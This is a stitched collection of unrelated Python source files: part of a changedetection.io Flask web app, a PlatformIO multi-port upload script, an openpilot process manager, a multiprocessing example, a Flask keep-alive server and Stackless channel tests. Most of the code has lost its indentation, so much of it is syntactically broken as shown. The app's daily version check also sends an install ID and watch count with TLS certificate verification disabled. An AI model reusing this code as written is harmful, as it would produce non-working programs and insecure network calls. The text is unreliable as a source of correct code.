limit_date = re.sub('(\d\d:\d\d)(:\d\d)', '\\1', limit_date)
str_to_dt = datetime.datetime.strptime(limit_date, '%Y/%m/%d %H:%M')
limit_timestamp = int(str_to_dt.timestamp())
if limit_timestamp > time.time():
flash("Timestamp is in the future, cannot continue.", 'error')
return redirect(url_for('scrub_page'))
except ValueError:
flash('Incorrect date format, cannot continue.', 'error')
return redirect(url_for('scrub_page'))
if confirmtext == 'scrub':
changes_removed = 0
for uuid, watch in datastore.data['watching'].items():
if limit_timestamp:
changes_removed += datastore.scrub_watch(uuid, limit_timestamp=limit_timestamp)
else:
changes_removed += datastore.scrub_watch(uuid)
flash("Cleared snapshot history ({} snapshots removed)".format(changes_removed))
else:
flash('Incorrect confirmation text.', 'error')
return redirect(url_for('index'))
output = render_template("scrub.html")
return output
# If they edited an existing watch, we need to know to reset the current/previous md5 to include
# the excluded text.
def get_current_checksum_include_ignore_text(uuid):
import hashlib
from backend import fetch_site_status
# Get the most recent one
newest_history_key = datastore.get_val(uuid, 'newest_history_key')
        # 0 means there's only one entry, so there should be no 'unviewed' history available
if newest_history_key == 0:
newest_history_key = list(datastore.data['watching'][uuid]['history'].keys())[0]
if newest_history_key:
with open(datastore.data['watching'][uuid]['history'][newest_history_key],
encoding='utf-8') as file:
raw_content = file.read()
handler = fetch_site_status.perform_site_check(datastore=datastore)
stripped_content = handler.strip_ignore_text(raw_content,
datastore.data['watching'][uuid]['ignore_text'])
checksum = hashlib.md5(stripped_content).hexdigest()
return checksum
return datastore.data['watching'][uuid]['previous_md5']
@app.route("/edit/<string:uuid>", methods=['GET', 'POST'])
@login_required
def edit_page(uuid):
from backend import forms
form = forms.watchForm(request.form)
        # Mostly for testing - allow 'first' to return the first/only watch
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
if request.method == 'GET':
if not uuid in datastore.data['watching']:
flash("No watch with the UUID %s found." % (uuid), "error")
return redirect(url_for('index'))
populate_form_from_watch(form, datastore.data['watching'][uuid])
if request.method == 'POST' and form.validate():
# Re #110, if they submit the same as the default value, set it to None, so we continue to follow the default
if form.minutes_between_check.data == datastore.data['settings']['requests']['minutes_between_check']:
form.minutes_between_check.data = None
update_obj = {'url': form.url.data.strip(),
'minutes_between_check': form.minutes_between_check.data,
'tag': form.tag.data.strip(),
'title': form.title.data.strip(),
'headers': form.headers.data
}
# Notification URLs
datastore.data['watching'][uuid]['notification_urls'] = form.notification_urls.data
# Ignore text
form_ignore_text = form.ignore_text.data
datastore.data['watching'][uuid]['ignore_text'] = form_ignore_text
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form_ignore_text:
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
            # Reset the previous_md5 so we process a new snapshot, including stripping ignore text.
            # Compare before saving, otherwise the stored value already matches the form value.
            if form.css_filter.data.strip() != datastore.data['watching'][uuid]['css_filter']:
                if len(datastore.data['watching'][uuid]['history']):
                    update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
            datastore.data['watching'][uuid]['css_filter'] = form.css_filter.data.strip()
datastore.data['watching'][uuid].update(update_obj)
datastore.needs_write = True
flash("Updated watch.")
# Queue the watch for immediate recheck
update_q.put(uuid)
if form.trigger_check.data:
n_object = {'watch_url': form.url.data.strip(),
'notification_urls': form.notification_urls.data,
'uuid': uuid}
notification_q.put(n_object)
flash('Notifications queued.')
# Diff page [edit] link should go back to diff page
if request.args.get("next") and request.args.get("next") == 'diff':
return redirect(url_for('diff_history_page', uuid=uuid))
else:
return redirect(url_for('index'))
else:
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
# Re #110 offer the default minutes
using_default_minutes = False
if form.minutes_between_check.data == None:
form.minutes_between_check.data = datastore.data['settings']['requests']['minutes_between_check']
using_default_minutes = True
output = render_template("edit.html",
uuid=uuid,
watch=datastore.data['watching'][uuid],
form=form,
using_default_minutes=using_default_minutes
)
return output
@app.route("/settings", methods=['GET', "POST"])
@login_required
def settings_page():
from backend import forms
form = forms.globalSettingsForm(request.form)
if request.method == 'GET':
form.minutes_between_check.data = int(datastore.data['settings']['requests']['minutes_between_check'])
form.notification_urls.data = datastore.data['settings']['application']['notification_urls']
form.extract_title_as_title.data = datastore.data['settings']['application']['extract_title_as_title']
form.notification_title.data = datastore.data['settings']['application']['notification_title']
form.notification_body.data = datastore.data['settings']['application']['notification_body']
# Password unset is a GET
if request.values.get('removepassword') == 'yes':
from pathlib import Path
datastore.data['settings']['application']['password'] = False
flash("Password protection removed.", 'notice')
flask_login.logout_user()
return redirect(url_for('settings_page'))
if request.method == 'POST' and form.validate():
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.data['settings']['requests']['minutes_between_check'] = form.minutes_between_check.data
datastore.data['settings']['application']['extract_title_as_title'] = form.extract_title_as_title.data
datastore.data['settings']['application']['notification_title'] = form.notification_title.data
datastore.data['settings']['application']['notification_body'] = form.notification_body.data
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.needs_write = True
if form.trigger_check.data and len(form.notification_urls.data):
n_object = {'watch_url': "Test from changedetection.io!",
'notification_urls': form.notification_urls.data}
notification_q.put(n_object)
flash('Notifications queued.')
if form.password.encrypted_password:
datastore.data['settings']['application']['password'] = form.password.encrypted_password
flash("Password protection enabled.", 'notice')
flask_login.logout_user()
return redirect(url_for('index'))
flash("Settings updated.")
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
# Same as notification.py
base_url = os.getenv('BASE_URL', '').strip('"')
output = render_template("settings.html", form=form, base_url=base_url)
return output
@app.route("/import", methods=['GET', "POST"])
@login_required
def import_page():
import validators
remaining_urls = []
good = 0
if request.method == 'POST':
urls = request.values.get('urls').split("\n")
for url in urls:
url = url.strip()
if len(url) and validators.url(url):
new_uuid = datastore.add_watch(url=url.strip(), tag="")
# Straight into the queue.
update_q.put(new_uuid)
good += 1
else:
if len(url):
remaining_urls.append(url)
flash("{} Imported, {} Skipped.".format(good, len(remaining_urls)))
if len(remaining_urls) == 0:
# Looking good, redirect to index.
return redirect(url_for('index'))
# Could be some remaining, or we could be on GET
output = render_template("import.html",
remaining="\n".join(remaining_urls)
)
return output
# Clear all statuses, so we do not see the 'unviewed' class
@app.route("/api/mark-all-viewed", methods=['GET'])
@login_required
def mark_all_viewed():
# Save the current newest history as the most recently viewed
for watch_uuid, watch in datastore.data['watching'].items():
datastore.set_last_viewed(watch_uuid, watch['newest_history_key'])
flash("Cleared all statuses.")
return redirect(url_for('index'))
@app.route("/diff/<string:uuid>", methods=['GET'])
@login_required
def diff_history_page(uuid):
        # Mostly for testing - allow 'first' to return the first/only watch
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
dates = list(watch['history'].keys())
# Convert to int, sort and back to str again
dates = [int(i) for i in dates]
dates.sort(reverse=True)
dates = [str(i) for i in dates]
if len(dates) < 2:
flash("Not enough saved change detection snapshots to produce a report.", "error")
return redirect(url_for('index'))
# Save the current newest history as the most recently viewed
datastore.set_last_viewed(uuid, dates[0])
newest_file = watch['history'][dates[0]]
with open(newest_file, 'r') as f:
newest_version_file_contents = f.read()
previous_version = request.args.get('previous_version')
try:
previous_file = watch['history'][previous_version]
except KeyError:
# Not present, use a default value, the second one in the sorted list.
previous_file = watch['history'][dates[1]]
with open(previous_file, 'r') as f:
previous_version_file_contents = f.read()
output = render_template("diff.html", watch_a=watch,
newest=newest_version_file_contents,
previous=previous_version_file_contents,
extra_stylesheets=extra_stylesheets,
versions=dates[1:],
uuid=uuid,
newest_version_timestamp=dates[0],
current_previous_version=str(previous_version),
current_diff_url=watch['url'],
extra_title=" - Diff - {}".format(watch['title'] if watch['title'] else watch['url']),
left_sticky= True )
return output
@app.route("/preview/<string:uuid>", methods=['GET'])
@login_required
def preview_page(uuid):
        # Mostly for testing - allow 'first' to return the first/only watch
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
newest = list(watch['history'].keys())[-1]
with open(watch['history'][newest], 'r') as f:
content = f.readlines()
output = render_template("preview.html",
content=content,
extra_stylesheets=extra_stylesheets,
current_diff_url=watch['url'],
uuid=uuid)
return output
@app.route("/favicon.ico", methods=['GET'])
def favicon():
return send_from_directory("/app/static/images", filename="favicon.ico")
# We're good but backups are even better!
@app.route("/backup", methods=['GET'])
@login_required
def get_backup():
import zipfile
from pathlib import Path
# Remove any existing backup file, for now we just keep one file
for previous_backup_filename in Path(app.config['datastore_path']).rglob('changedetection-backup-*.zip'):
os.unlink(previous_backup_filename)
# create a ZipFile object
backupname = "changedetection-backup-{}.zip".format(int(time.time()))
# We only care about UUIDS from the current index file
uuids = list(datastore.data['watching'].keys())
backup_filepath = os.path.join(app.config['datastore_path'], backupname)
with zipfile.ZipFile(backup_filepath, "w",
compression=zipfile.ZIP_DEFLATED,
compresslevel=8) as zipObj:
# Be sure we're written fresh
datastore.sync_to_json()
# Add the index
zipObj.write(os.path.join(app.config['datastore_path'], "url-watches.json"), arcname="url-watches.json")
# Add the flask app secret
zipObj.write(os.path.join(app.config['datastore_path'], "secret.txt"), arcname="secret.txt")
# Add any snapshot data we find, use the full path to access the file, but make the file 'relative' in the Zip.
for txt_file_path in Path(app.config['datastore_path']).rglob('*.txt'):
parent_p = txt_file_path.parent
if parent_p.name in uuids:
zipObj.write(txt_file_path,
arcname=str(txt_file_path).replace(app.config['datastore_path'], ''),
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
# Create a list file with just the URLs, so it's easier to port somewhere else in the future
list_file = os.path.join(app.config['datastore_path'], "url-list.txt")
with open(list_file, "w") as f:
for uuid in datastore.data['watching']:
url = datastore.data['watching'][uuid]['url']
f.write("{}\r\n".format(url))
# Add it to the Zip
zipObj.write(list_file,
arcname="url-list.txt",
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
return send_from_directory(app.config['datastore_path'], backupname, as_attachment=True)
@app.route("/static/<string:group>/<string:filename>", methods=['GET'])
def static_content(group, filename):
# These files should be in our subdirectory
full_path = os.path.realpath(__file__)
p = os.path.dirname(full_path)
try:
return send_from_directory("{}/static/{}".format(p, group), filename=filename)
except FileNotFoundError:
abort(404)
@app.route("/api/add", methods=['POST'])
@login_required
def api_watch_add():
from backend import forms
form = forms.quickWatchForm(request.form)
if form.validate():
url = request.form.get('url').strip()
if datastore.url_exists(url):
flash('The URL {} already exists'.format(url), "error")
return redirect(url_for('index'))
# @todo add_watch should throw a custom Exception for validation etc
new_uuid = datastore.add_watch(url=url, tag=request.form.get('tag').strip())
# Straight into the queue.
update_q.put(new_uuid)
flash("Watch added.")
return redirect(url_for('index'))
else:
flash("Error")
return redirect(url_for('index'))
@app.route("/api/delete", methods=['GET'])
@login_required
def api_delete():
uuid = request.args.get('uuid')
datastore.delete(uuid)
flash('Deleted.')
return redirect(url_for('index'))
@app.route("/api/checknow", methods=['GET'])
@login_required
def api_watch_checknow():
tag = request.args.get('tag')
uuid = request.args.get('uuid')
i = 0
running_uuids = []
for t in running_update_threads:
running_uuids.append(t.current_uuid)
# @todo check thread is running and skip
if uuid:
if uuid not in running_uuids:
update_q.put(uuid)
i = 1
elif tag != None:
# Items that have this current tag
for watch_uuid, watch in datastore.data['watching'].items():
if (tag != None and tag in watch['tag']):
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
else:
# No tag, no uuid, add everything.
for watch_uuid, watch in datastore.data['watching'].items():
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
flash("{} watches are rechecking.".format(i))
return redirect(url_for('index', tag=tag))
# @todo handle ctrl break
ticker_thread = threading.Thread(target=ticker_thread_check_time_launch_checks).start()
threading.Thread(target=notification_runner).start()
# Check for new release version
threading.Thread(target=check_for_new_version).start()
return app
# Check for new version and anonymous stats
def check_for_new_version():
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
while not app.config.exit.is_set():
try:
r = requests.post("https://changedetection.io/check-ver.php",
data={'version': datastore.data['version_tag'],
'app_guid': datastore.data['app_guid'],
'watch_count': len(datastore.data['watching'])
},
verify=False)
            if "new_version" in r.text:
                app.config['NEW_VERSION_AVAILABLE'] = True
        except Exception:
            # Network or response problems are not fatal here, just retry on the next cycle
            pass
# Check daily
app.config.exit.wait(86400)
def notification_runner():
while not app.config.exit.is_set():
try:
# At the moment only one thread runs (single runner)
n_object = notification_q.get(block=False)
except queue.Empty:
time.sleep(1)
else:
# Process notifications
try:
from backend import notification
notification.process_notification(n_object, datastore)
except Exception as e:
print("Watch URL: {} Error {}".format(n_object['watch_url'], e))
# Thread runner to check every minute, look for new watches to feed into the Queue.
def ticker_thread_check_time_launch_checks():
from backend import update_worker
# Spin up Workers.
for _ in range(datastore.data['settings']['requests']['workers']):
new_worker = update_worker.update_worker(update_q, notification_q, app, datastore)
running_update_threads.append(new_worker)
new_worker.start()
while not app.config.exit.is_set():
# Get a list of watches by UUID that are currently fetching data
running_uuids = []
for t in running_update_threads:
if t.current_uuid:
running_uuids.append(t.current_uuid)
# Check for watches outside of the time threshold to put in the thread queue.
for uuid, watch in datastore.data['watching'].items():
# If they supplied an individual entry minutes to threshold.
if 'minutes_between_check' in watch and watch['minutes_between_check'] is not None:
max_time = watch['minutes_between_check'] * 60
else:
# Default system wide.
max_time = datastore.data['settings']['requests']['minutes_between_check'] * 60
threshold = time.time() - max_time
# Yeah, put it in the queue, it's more than time.
if not watch['paused'] and watch['last_checked'] <= threshold:
if not uuid in running_uuids and uuid not in update_q.queue:
update_q.put(uuid)
# Wait a few seconds before checking the list again
time.sleep(3)
# Should be low so we can break this out in testing
app.config.exit.wait(1)
|
multiUpload.py
|
Import('env')
from platformio import util
import threading
from threading import Thread
from base64 import b64decode
import sys
import glob
import time
# Based on https://github.com/platformio/platformio-core/issues/1383
upload_cmd = env.subst('$UPLOADCMD')
def getPorts():
simultaneous_upload_ports = ARGUMENTS.get("SIMULTANEOUS_UPLOAD_PORTS")
    ports = [{"port": x.strip()} for x in b64decode(simultaneous_upload_ports).decode().split(',')]
    if ports[0]["port"] == "AUTO":
        ports = util.get_serial_ports()
        ports = [x for x in ports if x["port"].find("SLAB") != -1]
    return ports
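# Hedged note (not part of the original script): SIMULTANEOUS_UPLOAD_PORTS is
# expected to be either "AUTO" or a base64-encoded, comma-separated port list.
# A value like that could be produced with, for example:
#   python -c "import base64; print(base64.b64encode(b'/dev/ttyUSB0,/dev/ttyUSB1').decode())"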
returnCodes=[]
def run(port):
for i in range (5):
command = upload_cmd.replace('--port ""', '--port "' + port + '"')
command = command +" "+ env.subst('$BUILD_DIR/$PROGNAME') +".bin"
errorCode = env.Execute(command)
if errorCode == 0:
returnCodes.append( (port, errorCode) )
return
time.sleep(2)
returnCodes.append((port,errorCode))
def multi_upload(source, target, env):
print("Multi-target upload active on ports: ")
for x in getPorts():
print(" " + x["port"])
print("")
threads = []
for port in getPorts() :
thread = Thread(target=run, args=(port["port"],))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
encounteredError=False
    returnCodes.sort(key=lambda code: code[0])
print("")
print("Upload result -------------------------------------------------")
for code in returnCodes:
if(code[1]==0):
print("| " + code[0] + " Uploaded Successfully")
elif(code[1]==1):
print("| " + code[0] + " Encountered Exception, Check serial port")
encounteredError=True
elif(code[1]==2):
print("| " + code[0] + " Encountered Fatal Error")
encounteredError=True
print("")
if(encounteredError):
Exit(1)
if ARGUMENTS.get("SIMULTANEOUS_UPLOAD_PORTS"):
env.Replace(UPLOADCMD="true")
env.AddPreAction("upload", multi_upload)
|
manager.py
|
#!/usr/bin/env python3
import datetime
import os
import signal
import subprocess
import sys
import traceback
from multiprocessing import Process
import cereal.messaging as messaging
import selfdrive.crash as crash
from common.basedir import BASEDIR
from common.params import Params, ParamKeyType
from common.text_window import TextWindow
from selfdrive.boardd.set_time import set_time
from selfdrive.hardware import HARDWARE, PC
from selfdrive.manager.helpers import unblock_stdout
from selfdrive.manager.process import ensure_running, launcher
from selfdrive.manager.process_config import managed_processes
from selfdrive.athena.registration import register, UNREGISTERED_DONGLE_ID
from selfdrive.swaglog import cloudlog, add_file_handler
from selfdrive.version import get_dirty, get_commit, get_version, get_origin, get_short_branch, \
terms_version, training_version, get_comma_remote
sys.path.append(os.path.join(BASEDIR, "pyextra"))
def manager_init():
# update system time from panda
set_time(cloudlog)
# save boot log
subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
params.clear_all(ParamKeyType.CLEAR_ON_MANAGER_START)
default_params = [
("CompletedTrainingVersion", "0"),
("HasAcceptedTerms", "0"),
("OpenpilotEnabledToggle", "1"),
("AutoLaneChangeEnabled", "0"),
("PrebuiltEnabled", "0"),
#UI things
("ShowDebugUI", "0"),
("ShowCpuTempUI", "0"),
("ShowBattLevelUI", "0"),
#Lateral Control Selection
#("INDI_Selected", "0"),
#("LQR_Selected", "1"),
]
if not PC:
default_params.append(("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')))
if params.get_bool("RecordFrontLock"):
params.put_bool("RecordFront", True)
if not params.get_bool("DisableRadar_Allow"):
params.delete("DisableRadar")
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put_bool("Passive", bool(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set version params
params.put("Version", get_version())
params.put("TermsVersion", terms_version)
params.put("TrainingVersion", training_version)
params.put("GitCommit", get_commit(default=""))
params.put("GitBranch", get_short_branch(default=""))
params.put("GitRemote", get_origin(default=""))
# set dongle id
reg_res = register(show_spinner=True)
if reg_res:
dongle_id = reg_res
else:
serial = params.get("HardwareSerial")
raise Exception(f"Registration failed for device {serial}")
os.environ['DONGLE_ID'] = dongle_id # Needed for swaglog
if not get_dirty():
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=get_version(), dirty=get_dirty(),
device=HARDWARE.get_device_type())
if get_comma_remote() and not (os.getenv("NOLOG") or os.getenv("NOCRASH") or PC):
crash.init()
crash.bind_user(id=dongle_id)
crash.bind_extra(dirty=get_dirty(), origin=get_origin(), branch=get_short_branch(), commit=get_commit(),
device=HARDWARE.get_device_type())
def manager_prepare():
for p in managed_processes.values():
p.prepare()
def manager_cleanup():
# send signals to kill all procs
for p in managed_processes.values():
p.stop(block=False)
# ensure all are killed
for p in managed_processes.values():
p.stop(block=True)
cloudlog.info("everything is dead")
def manager_thread():
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
Process(name="road_speed_limiter", target=launcher, args=("selfdrive.road_speed_limiter",)).start()
params = Params()
ignore = []
if params.get("DongleId", encoding='utf8') == UNREGISTERED_DONGLE_ID:
ignore += ["manage_athenad", "uploader"]
if os.getenv("NOBOARD") is not None:
ignore.append("pandad")
if os.getenv("BLOCK") is not None:
ignore += os.getenv("BLOCK").split(",")
ensure_running(managed_processes.values(), started=False, not_run=ignore)
started_prev = False
sm = messaging.SubMaster(['deviceState'])
pm = messaging.PubMaster(['managerState'])
while True:
sm.update()
not_run = ignore[:]
if sm['deviceState'].freeSpacePercent < 5:
not_run.append("loggerd")
started = sm['deviceState'].started
driverview = params.get_bool("IsDriverViewEnabled")
ensure_running(managed_processes.values(), started, driverview, not_run)
# trigger an update after going offroad
if started_prev and not started and 'updated' in managed_processes:
os.sync()
managed_processes['updated'].signal(signal.SIGHUP)
started_prev = started
running = ' '.join("%s%s\u001b[0m" % ("\u001b[32m" if p.proc.is_alive() else "\u001b[31m", p.name)
for p in managed_processes.values() if p.proc)
print(running)
cloudlog.debug(running)
# send managerState
msg = messaging.new_message('managerState')
msg.managerState.processes = [p.get_process_state_msg() for p in managed_processes.values()]
pm.send('managerState', msg)
# Exit main loop when uninstall/shutdown/reboot is needed
shutdown = False
for param in ("DoUninstall", "DoShutdown", "DoReboot"):
if params.get_bool(param):
cloudlog.warning(f"Shutting down manager - {param} set")
shutdown = True
if shutdown:
break
def main():
prepare_only = os.getenv("PREPAREONLY") is not None
manager_init()
# Start UI early so prepare can happen in the background
if not prepare_only:
managed_processes['ui'].start()
manager_prepare()
if prepare_only:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
manager_cleanup()
params = Params()
if params.get_bool("DoUninstall"):
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
elif params.get_bool("DoReboot"):
cloudlog.warning("reboot")
HARDWARE.reboot()
elif params.get_bool("DoShutdown"):
cloudlog.warning("shutdown")
HARDWARE.shutdown()
if __name__ == "__main__":
unblock_stdout()
try:
main()
except Exception:
add_file_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
mp_workers.py
|
#
# Simple example which uses a pool of workers to carry out some tasks.
#
# Notice that the results will probably not come out of the output
# queue in the same order as the corresponding tasks were
# put on the input queue. If it is important to get the results back
# in the original order then consider using `Pool.map()` or
# `Pool.imap()` (which will save on the amount of code needed anyway).
#
import time
import random
from multiprocessing import Process, Queue, current_process, freeze_support
#
# Function run by worker processes
#
def worker(input, output):
for func, args in iter(input.get, 'STOP'):
result = calculate(func, args)
output.put(result)
#
# Function used to calculate result
#
def calculate(func, args):
result = func(*args)
return '%s says that %s%s = %s' % \
(current_process().name, func.__name__, args, result)
#
# Functions referenced by tasks
#
def mul(a, b):
time.sleep(0.5*random.random())
return a * b
def plus(a, b):
time.sleep(0.5*random.random())
return a + b
#
#
#
def test():
NUMBER_OF_PROCESSES = 4
TASKS1 = [(mul, (i, 7)) for i in range(20)]
TASKS2 = [(plus, (i, 8)) for i in range(10)]
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for task in TASKS1:
task_queue.put(task)
# Start worker processes
for i in range(NUMBER_OF_PROCESSES):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
    print('Unordered results:')
for i in range(len(TASKS1)):
        print('\t', done_queue.get())
# Add more tasks using `put()`
for task in TASKS2:
task_queue.put(task)
# Get and print some more results
for i in range(len(TASKS2)):
        print('\t', done_queue.get())
# Tell child processes to stop
for i in range(NUMBER_OF_PROCESSES):
task_queue.put('STOP')
if __name__ == '__main__':
freeze_support()
test()
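# A minimal, hedged sketch of the ordered alternative mentioned in the header
# comment: multiprocessing.Pool.imap yields results in submission order, so no
# manual result queue is needed. It reuses mul() from above, is illustrative
# only, and is never called by this example.
def star_mul(args):
    # Pool.imap passes one argument per task, so unpack the (a, b) pair here.
    return mul(*args)

def ordered_results_sketch():
    from multiprocessing import Pool
    tasks = [(i, 7) for i in range(20)]
    pool = Pool(processes=4)
    try:
        # Unlike the worker/Queue approach above, imap preserves task order.
        for result in pool.imap(star_mul, tasks):
            print('\t', result)
    finally:
        pool.close()
        pool.join()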
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "https://moneybrozbot.xyz"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
test_channel.py
|
from __future__ import absolute_import
import unittest
import stackless
try:
import threading
withThreads = True
except ImportError:
withThreads = False
import sys
import traceback
import contextlib
from support import test_main # @UnusedImport
from support import StacklessTestCase, require_one_thread
@contextlib.contextmanager
def block_trap(trap=True):
"""
A context manager to temporarily set the block trap state of the
current tasklet. Defaults to setting it to True
"""
c = stackless.getcurrent()
old = c.block_trap
c.block_trap = trap
try:
yield
finally:
c.block_trap = old
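# A small, hedged sketch of the rendezvous behaviour exercised by the tests
# below: a sender blocks until a receiver arrives, and channel.balance records
# who is waiting. It only uses APIs already used in this file
# (stackless.channel, stackless.tasklet, stackless.run) and is never called.
def _channel_rendezvous_sketch():
    channel = stackless.channel()

    def producer():
        # Blocks here until some tasklet is ready to receive.
        channel.send("payload")

    stackless.tasklet(producer)()
    stackless.run()
    # A positive balance means senders are waiting; negative means receivers.
    assert channel.balance == 1
    value = channel.receive()  # wakes the blocked producer
    assert value == "payload"
    return value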
class TestChannels(StacklessTestCase):
def testBlockingSend(self):
''' Test that when a tasklet sends to a channel without waiting receivers, the tasklet is blocked. '''
# Function to block when run in a tasklet.
def f(testChannel):
testChannel.send(1)
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
# The tasklet should be blocked.
self.assertTrue(tasklet.blocked, "The tasklet should have been run and have blocked on the channel waiting for a corresponding receiver")
# The channel should have a balance indicating one blocked sender.
self.assertTrue(channel.balance == 1, "The channel balance should indicate one blocked sender waiting for a corresponding receiver")
def testBlockingReceive(self):
''' Test that when a tasklet receives from a channel without waiting senders, the tasklet is blocked. '''
# Function to block when run in a tasklet.
def f(testChannel):
testChannel.receive()
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
# The tasklet should be blocked.
self.assertTrue(tasklet.blocked, "The tasklet should have been run and have blocked on the channel waiting for a corresponding sender")
        # The channel should have a balance indicating one blocked receiver.
self.assertEqual(channel.balance, -1, "The channel balance should indicate one blocked receiver waiting for a corresponding sender")
def testNonBlockingSend(self):
''' Test that when there is a waiting receiver, we can send without blocking with normal channel behaviour. '''
originalValue = 1
receivedValues = []
# Function to block when run in a tasklet.
def f(testChannel):
receivedValues.append(testChannel.receive())
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
# Make sure that the current tasklet cannot block when it tries to receive. We do not want
# to exit this test having clobbered the block trapping value, so we make sure we restore
# it.
oldBlockTrap = stackless.getcurrent().block_trap
try:
stackless.getcurrent().block_trap = True
channel.send(originalValue)
finally:
stackless.getcurrent().block_trap = oldBlockTrap
self.assertTrue(len(receivedValues) == 1 and receivedValues[0] == originalValue, "We sent a value, but it was not the one we received. Completely unexpected.")
def testNonBlockingReceive(self):
''' Test that when there is a waiting sender, we can receive without blocking with normal channel behaviour. '''
originalValue = 1
# Function to block when run in a tasklet.
def f(testChannel, valueToSend):
testChannel.send(valueToSend)
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel, originalValue)
tasklet.run()
# Make sure that the current tasklet cannot block when it tries to receive. We do not want
# to exit this test having clobbered the block trapping value, so we make sure we restore
# it.
oldBlockTrap = stackless.getcurrent().block_trap
try:
stackless.getcurrent().block_trap = True
value = channel.receive()
finally:
stackless.getcurrent().block_trap = oldBlockTrap
tasklet.kill()
self.assertEqual(value, originalValue, "We received a value, but it was not the one we sent. Completely unexpected.")
@require_one_thread
def testMainTaskletBlockingWithoutASender(self):
''' Test that the last runnable tasklet cannot be blocked on a channel. '''
c = stackless.channel()
self.assertRaises(RuntimeError, c.receive)
@unittest.skipUnless(withThreads, "Compiled without threading")
def testInterthreadCommunication(self):
''' Test that tasklets in different threads sending over channels to each other work. '''
commandChannel = stackless.channel()
def master_func():
commandChannel.send("ECHO 1")
commandChannel.send("ECHO 2")
commandChannel.send("ECHO 3")
commandChannel.send("QUIT")
def slave_func():
while 1:
command = commandChannel.receive()
if command == "QUIT":
break
def scheduler_run(tasklet_func):
t = stackless.tasklet(tasklet_func)()
while t.alive:
stackless.run()
thread = threading.Thread(target=scheduler_run, args=(master_func,))
thread.start()
scheduler_run(slave_func)
thread.join()
def testSendException(self):
# Function to send the exception
def f(testChannel):
testChannel.send_exception(ValueError, 1, 2, 3)
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
self.assertRaises(ValueError, channel.receive)
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
try:
channel.receive()
except ValueError as e:
self.assertEqual(e.args, (1, 2, 3))
def testSendThrow(self):
# subfunction in tasklet
def bar():
raise ValueError(1, 2, 3)
# Function to send the exception
def f(testChannel):
try:
bar()
except Exception:
testChannel.send_throw(*sys.exc_info())
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
self.assertRaises(ValueError, channel.receive)
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
try:
channel.receive()
except ValueError:
exc, val, tb = sys.exc_info()
self.assertEqual(val.args, (1, 2, 3))
# Check that the traceback is correct
l = traceback.extract_tb(tb)
self.assertEqual(l[-1][2], "bar")
def testBlockTrapSend(self):
        '''Test that block trapping works when sending'''
channel = stackless.channel()
count = [0]
def f():
with block_trap():
self.assertRaises(RuntimeError, channel.send, None)
count[0] += 1
# Test on main tasklet and on worker
f()
stackless.tasklet(f)()
stackless.run()
self.assertEqual(count[0], 2)
def testBlockTrapRecv(self):
'''Test that block trapping works when receiving'''
channel = stackless.channel()
count = [0]
def f():
with block_trap():
self.assertRaises(RuntimeError, channel.receive)
count[0] += 1
f()
stackless.tasklet(f)()
stackless.run()
self.assertEqual(count[0], 2)
class TestClose(StacklessTestCase):
